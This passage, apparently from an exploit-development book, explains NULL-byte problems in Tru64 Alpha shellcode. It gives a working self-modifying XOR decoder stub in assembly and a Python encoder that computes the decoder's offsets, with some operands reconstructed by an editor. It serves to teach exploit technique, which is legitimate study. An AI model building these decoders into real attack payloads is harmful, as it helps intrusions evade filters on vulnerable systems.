The first challenge in developing Tru64 shellcode is that the PAL_callsys instruction is not NULL free. The PAL_callsys opcode contains three NULL bytes (\x83\x00\x00\x00), and it cannot be replaced with another opcode, because PAL_callsys is the only way to invoke system calls. Programmers who have dealt with this problem have come up with two remedies; however, we believe there is a better solution.

The first remedy is to encode the PAL_callsys instruction on the stack, and then call it whenever a system call is needed. This solution cannot work on Tru64; remember, the stack is not executable by default. Calling code on the stack terminates the process immediately with SIGSEGV.

The other remedy is to write self-modifying shellcode that patches the PAL_callsys instruction into the shellcode text at runtime. This strategy is the most similar to our solution, but it is still not efficient: shellcode that makes many system calls grows rapidly in size. If you use this method, you will also need to flush the I-cache whenever you modify any instruction. Ironically, the instruction that flushes the I-cache also contains three NULL bytes, rendering the entire effort useless. Therefore, we need a new method.

The best solution to these NULL byte struggles is to use the method described in Chapter 3 of this book, "Shellcode." The following code is our implementation of a simple Alpha assembly XOR decoder. It is not optimized, so feel free to improve and compact it if you wish.
#include <alpha/regdef.h>
#include <alpha/pal.h>

        .text
        .arch   generic
        .align  4
        .globl  main
        .ent    main
main:
        .frame  $sp, 0, $26     #third operand is missing in the source listing;
                                #$26 (the return address register) is assumed.

        lda     a0, -1000(sp)   #GetPC code we have just covered.
back:
        bis     zero, 0x86, a1  #a1 equals 0x00000086, which is the imb
                                #instruction; it syncs the instruction cache,
                                #making it coherent with main memory.
        stl     a1, -4(a0)      #1st run: store the imb instruction on the
                                #stack near sp - 1000.
                                #2nd run: overwrite the following bsr
                                #instruction with imb.
        addq    a0, 48, a2
        stl     a1, -4(a2)      #also overwrite the 0x41414141 with the imb
                                #instruction, thus avoiding I-cache incoherency
                                #after the decode process. Since the imb
                                #instruction also has NULL bytes, this is the
                                #only way to avoid NULL bytes in the decoder loop.
        bsr     a0, back        #branch to the label back, saving pc in a0.
                                #on the second run bsr will have been
                                #overwritten; execution continues with the
                                #next instruction.
        addq    a0, 52, a4      #offset to xored data plus four.
        addq    zero, 212, a3   #size of xored data in bytes. !!CHANGE HERE!!
        addq    a0, 264, a5     #offset to xor key; equals xored data size
                                #plus 52. !CHANGE! this offset
        addq    a0, 48, a0      #a0 should point to the first instruction of
                                #the xored data; the real shellcode should
                                #expect it this way.
        ldl     a1, -4(a5)      #load the xor key.
xorloop:
        ldl     a2, -4(a4)      #load a single long from the xored data.
        xor     a2, a1, a2      #xor/decrypt the long.
        stl     a2, -4(a4)      #store the long back into its location.
        subq    a3, 4, a3       #decrement counter.
        addq    a4, 4, a4       #increment xored data pointer, move to next long.
        bne     a3, xorloop     #branch back to xorloop until counter is zero.
        .long   0x41414141      #this long will be overwritten with the imb
                                #instruction. flush I-cache.

                                #xored data starts here. Place the real shellcode
                                #encoded with the following XOR key. !CHANGE!

        .long   0x88888888      #XOR key. !!CHANGE HERE if necessary!!
        .end    main            #closes .ent main; not present in the source listing.
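The values marked !CHANGE! in the decoder depend on the encoded data, so it can help to work them out offline. The following Python sketch is not part of the original listing; the function names (`xor_longs`, `encode`, `decoder_constants`) are hypothetical helpers. It assumes the data is processed as little-endian 32-bit longs, as the decoder's `ldl`/`xor`/`stl` loop does, and that the fixed offset of 52 from the listing above still applies.

```python
import struct


def xor_longs(data: bytes, key: int) -> bytes:
    """XOR every little-endian 32-bit long in data with key."""
    if len(data) % 4 != 0:
        raise ValueError("data length must be a multiple of 4 bytes")
    count = len(data) // 4
    longs = struct.unpack("<%dL" % count, data)
    return struct.pack("<%dL" % count, *(value ^ key for value in longs))


def encode(payload: bytes, key: int = 0x88888888) -> bytes:
    """Encode payload and verify that the result is NULL free."""
    encoded = xor_longs(payload, key)
    if b"\x00" in encoded:
        # Any payload byte equal to the matching key byte becomes NULL.
        raise ValueError("encoded data contains a NULL byte; choose another key")
    return encoded


def decoder_constants(encoded: bytes) -> dict:
    """Values for the !CHANGE! lines, assuming the listing's offset of 52."""
    size = len(encoded)
    return {"size": size, "key_offset": size + 52}
```

For example, the PAL_callsys bytes `\x83\x00\x00\x00` encode to `\x0b\x88\x88\x88` with the key 0x88888888, and applying `xor_longs` to the result with the same key restores the original bytes. For 212 bytes of encoded data, `decoder_constants` gives a size of 212 and a key offset of 264, matching the constants in the listing.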